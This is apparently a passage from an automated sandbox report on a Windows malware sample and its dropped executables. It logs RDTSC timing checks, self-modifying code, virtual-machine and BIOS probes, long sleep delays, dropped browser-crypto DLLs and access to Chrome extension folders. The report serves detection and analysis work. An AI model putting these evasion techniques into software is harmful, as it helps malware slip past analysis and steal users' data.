                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0A43 second address: 52F0A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov esi, edx 0x00000007 popad 0x00000008 push edx 0x00000009 pushad 0x0000000a mov esi, 0460B0D3h 0x0000000f mov ax, 872Fh 0x00000013 popad 0x00000014 mov dword ptr [esp], edi 0x00000017 pushad 0x00000018 mov dx, si 0x0000001b popad 0x0000001c mov eax, dword ptr [76FBB370h] 0x00000021 pushad 0x00000022 mov ax, B93Bh 0x00000026 mov esi, 73D7AE17h 0x0000002b popad 0x0000002c xor dword ptr [ebp-08h], eax 0x0000002f jmp 00007FA5CCB7DECAh 0x00000034 xor eax, ebp 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 mov edi, ecx 0x0000003b call 00007FA5CCB7DED6h 0x00000040 pop eax 0x00000041 popad 0x00000042 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0A9B second address: 52F0AA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0AA1 second address: 52F0B39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB7DECAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007FA5CCB7DED0h 0x00000011 push eax 0x00000012 pushad 0x00000013 push esi 0x00000014 mov edx, 16C019DEh 0x00000019 pop edx 0x0000001a popad 0x0000001b nop 0x0000001c pushad 0x0000001d mov di, si 0x00000020 call 00007FA5CCB7DECCh 0x00000025 mov di, cx 0x00000028 pop eax 0x00000029 popad 0x0000002a lea eax, dword ptr [ebp-10h] 0x0000002d pushad 0x0000002e movsx ebx, ax 0x00000031 mov esi, 764438BBh 0x00000036 popad 0x00000037 mov dword ptr fs:[00000000h], eax 0x0000003d jmp 00007FA5CCB7DECEh 0x00000042 mov esi, dword ptr [ebp+08h] 0x00000045 jmp 00007FA5CCB7DED0h 0x0000004a mov eax, dword ptr [esi+10h] 0x0000004d jmp 00007FA5CCB7DED0h 0x00000052 test eax, eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FA5CCB7DECAh 0x0000005d rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0B39 second address: 52F0B3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0B3F second address: 52F0B45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0B45 second address: 52F0B49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0B49 second address: 52F0B61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FA63E74D099h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movsx edi, ax 0x00000014 movzx esi, bx 0x00000017 popad 0x00000018 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0B61 second address: 52F0B67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0B67 second address: 52F0B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0B6B second address: 52F0B6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0B6F second address: 52F0BD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub eax, eax 0x0000000a jmp 00007FA5CCB7DED3h 0x0000000f mov dword ptr [ebp-20h], eax 0x00000012 jmp 00007FA5CCB7DED6h 0x00000017 mov ebx, dword ptr [esi] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FA5CCB7DECDh 0x00000022 or ax, BEF6h 0x00000027 jmp 00007FA5CCB7DED1h 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F026B second address: 52F026F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F026F second address: 52F0273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0273 second address: 52F0279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0279 second address: 52F02AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB7DECFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx ecx, bx 0x0000000e mov ax, dx 0x00000011 popad 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FA5CCB7DED6h 0x0000001b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 78EB38 second address: 78EB42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA5CCB52626h 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 78EB42 second address: 78EB48 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 78EB48 second address: 78EB50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 78EB50 second address: 78EB54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 78EB54 second address: 78EB77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA5CCB52626h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jp 00007FA5CCB52626h 0x00000017 jmp 00007FA5CCB5262Bh 0x0000001c popad 0x0000001d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 78EB77 second address: 78EB7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 7BC61C second address: 7BC620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 7BC620 second address: 7BC626 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 7BC626 second address: 7BC658 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FA5CCB52637h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007FA5CCB52626h 0x0000001a jno 00007FA5CCB52626h 0x00000020 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 7BC658 second address: 7BC65C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 7BC7C4 second address: 7BC7DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB52637h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 7BC7DF second address: 7BC7E9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA5CCB7DECCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 7BC7E9 second address: 7BC81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA5CCB52635h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d jmp 00007FA5CCB5262Fh 0x00000012 push edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 7BC95D second address: 7BC963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 7BC963 second address: 7BC988 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f pushad 0x00000010 jmp 00007FA5CCB52633h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSpecial instruction interceptor: First address: 9BE68E instructions caused by: Self-modifying code
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSpecial instruction interceptor: First address: 9BE75F instructions caused by: Self-modifying code
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSpecial instruction interceptor: First address: B51391 instructions caused by: Self-modifying code
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSpecial instruction interceptor: First address: B5AFC7 instructions caused by: Self-modifying code
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSpecial instruction interceptor: First address: BD7CFA instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: 62E68E instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: 62E75F instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: 7C1391 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: 7CAFC7 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: 847CFA instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exeSpecial instruction interceptor: First address: B0E68E instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exeSpecial instruction interceptor: First address: B0E75F instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exeSpecial instruction interceptor: First address: CA1391 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exeSpecial instruction interceptor: First address: CAAFC7 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exeSpecial instruction interceptor: First address: D27CFA instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeSpecial instruction interceptor: First address: 2BE68E instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeSpecial instruction interceptor: First address: 2BE75F instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeSpecial instruction interceptor: First address: 451391 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeSpecial instruction interceptor: First address: 45AFC7 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeSpecial instruction interceptor: First address: 4D7CFA instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeCode function: 0_2_05340DC0 rdtsc 0_2_05340DC0
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread delayed: delay time: 180000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 1313Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 417Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 1213Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 1262Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 1206Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeWindow / User API: threadDelayed 1100Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 5877Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 1441Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 4072
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeAPI coverage: 0.8 %
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7932Thread sleep time: -60030s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7928Thread sleep count: 1313 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7928Thread sleep time: -2627313s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7892Thread sleep count: 417 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7892Thread sleep time: -12510000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8032Thread sleep time: -180000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7904Thread sleep count: 1213 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7904Thread sleep time: -2427213s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7920Thread sleep count: 1262 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7920Thread sleep time: -2525262s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7908Thread sleep count: 1206 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7908Thread sleep time: -2413206s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exe TID: 8080Thread sleep count: 1100 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exe TID: 3096Thread sleep count: 148 > 30
                        Source: C:\Windows\SysWOW64\cmd.exe TID: 2692Thread sleep count: 4072 > 30
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C06C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc,4_2_6C06C930
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread delayed: delay time: 30000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread delayed: delay time: 180000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 11 Essential Server Solutions without Hyper-V
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: #Windows 10 Microsoft Hyper-V Server
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 8.1 Microsoft Hyper-V Server
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 2012 Server Standard without Hyper-V
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 8 Microsoft Hyper-V Server
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 11 Microsoft Hyper-V Server
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
                        Source: explorti.exe, 00000003.00000002.4096195243.00000000014B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW_
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 2012 R2 Server Standard without Hyper-V
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
                        Source: Amcache.hve.10.drBinary or memory string: vmci.sys
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
                        Source: 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: vmware
